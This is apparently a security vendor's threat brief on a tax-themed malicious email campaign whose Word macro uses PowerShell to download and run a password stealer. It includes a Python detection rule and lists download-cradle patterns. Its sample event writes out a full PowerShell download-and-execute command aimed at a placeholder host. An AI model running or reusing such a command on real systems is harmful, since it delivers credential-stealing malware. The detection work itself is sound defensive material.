What Is It?
As is inevitable at this time of year, there have been recent reports of large-scale malicious spam campaigns built around tax-related lures. One such campaign has been reported to involve tens of millions of malicious emails, each carrying an attachment named taxletter.doc.
The attackers have been observed regularly altering the text of the emails in an attempt to evade spam filters and other security products. However, the email subject and body text generally claim to be advising the recipient of an issue with their tax return or informing them of an unexpected tax windfall. The object, of course, is to get the recipient to open the attached malicious Word document and override the default warnings so that the embedded macro is allowed to run.
In this case, once allowed to run by the user, the macro issues a PowerShell command to download and execute a file from the bigrussiandomains[.]win site. The downloaded file, tax.exe, is then saved to the user’s Temporary directory as mixak.exe and executed.
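The chain described above (Word spawning PowerShell, which downloads an executable, drops it in the user's Temp directory under a new name and runs it) is visible in process-creation telemetry. The following is an added detection example, not code from the original report or from BluVector; it assumes Sysmon-style Event ID 1 fields and uses constructed sample records with a placeholder domain.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not
# real telemetry. The first mirrors the chain described in the report: Word
# spawning PowerShell to fetch tax.exe, drop it in %TEMP% as mixak.exe and run
# it. The domain is a placeholder, not the one named in the report.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c \"(New-Object Net.WebClient).DownloadFile("
                    "'http://lure.example/tax.exe', $env:TEMP+'\\mixak.exe'); "
                    "Start-Process ($env:TEMP+'\\mixak.exe')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
DOWNLOAD_PATTERNS = (r"downloadfile", r"downloadstring", r"invoke-webrequest",
                     r"\biwr\b", r"net\.webclient", r"start-bitstransfer")
TEMP_PATTERNS = (r"\$env:temp", r"%temp%", r"\\appdata\\local\\temp\\")
EXEC_PATTERNS = (r"start-process", r"invoke-item", r"\biex\b", r"invoke-expression")


def _any(patterns, text):
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def classify_event(event):
    """Return the list of indicators matched by one process-creation event."""
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "")
    indicators = []
    if parent in OFFICE_PARENTS:
        indicators.append("office_parent")
    if image in ("powershell.exe", "pwsh.exe"):
        indicators.append("powershell_child")
    if _any(DOWNLOAD_PATTERNS, cmd):
        indicators.append("download_cradle")
    if _any(TEMP_PATTERNS, cmd):
        indicators.append("temp_drop")
    if _any(EXEC_PATTERNS, cmd):
        indicators.append("exec_payload")
    return indicators


def is_macro_download_cradle(event):
    """True only when an Office parent launched PowerShell that both fetches
    from the network and executes something; a Temp drop strengthens the hit."""
    hits = set(classify_event(event))
    return {"office_parent", "powershell_child",
            "download_cradle", "exec_payload"} <= hits
```

A benign administrative PowerShell launch from Explorer matches only the `powershell_child` indicator and is not flagged, which keeps the rule focused on the Office-to-PowerShell parent relationship rather than on PowerShell use alone.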
The tax.exe malware is a password stealer that targets, among other things, passwords stored in browsers. Though convenient, storing passwords in a browser makes it easier for attackers to obtain credentials such as banking and other financial logins, social media credentials and credentials for internal systems on the corporate network. These credentials can easily be monetized by attackers, either by using them to commit financial fraud directly or by selling them. Internal credentials obviously give attackers a significant head start on reconnaissance and lateral movement within a corporate network.
Once again, these attacks rely on socially engineering users into not only opening an attachment but then allowing macros to run. These attacks continue to use this vector because it still works often enough that less skilled attackers have no need to invest the time and effort required for more sophisticated attacks.
How Does It Propagate?
None of the malware discussed here self-propagates.
Once again, these attacks depend on social engineering to succeed. Particularly at this time of year, it is important for users to be vigilant and aware of the likelihood of malicious emails using tax-related lures.
When/How Did BluVector Detect It?
BluVector’s patented Machine Learning Engine (MLE) detects this malware. Regression testing on two malicious Word document samples has shown they would have been detected by BluVector 48 months prior to their release. The password stealer malware sample would have been detected 14 months prior to its release.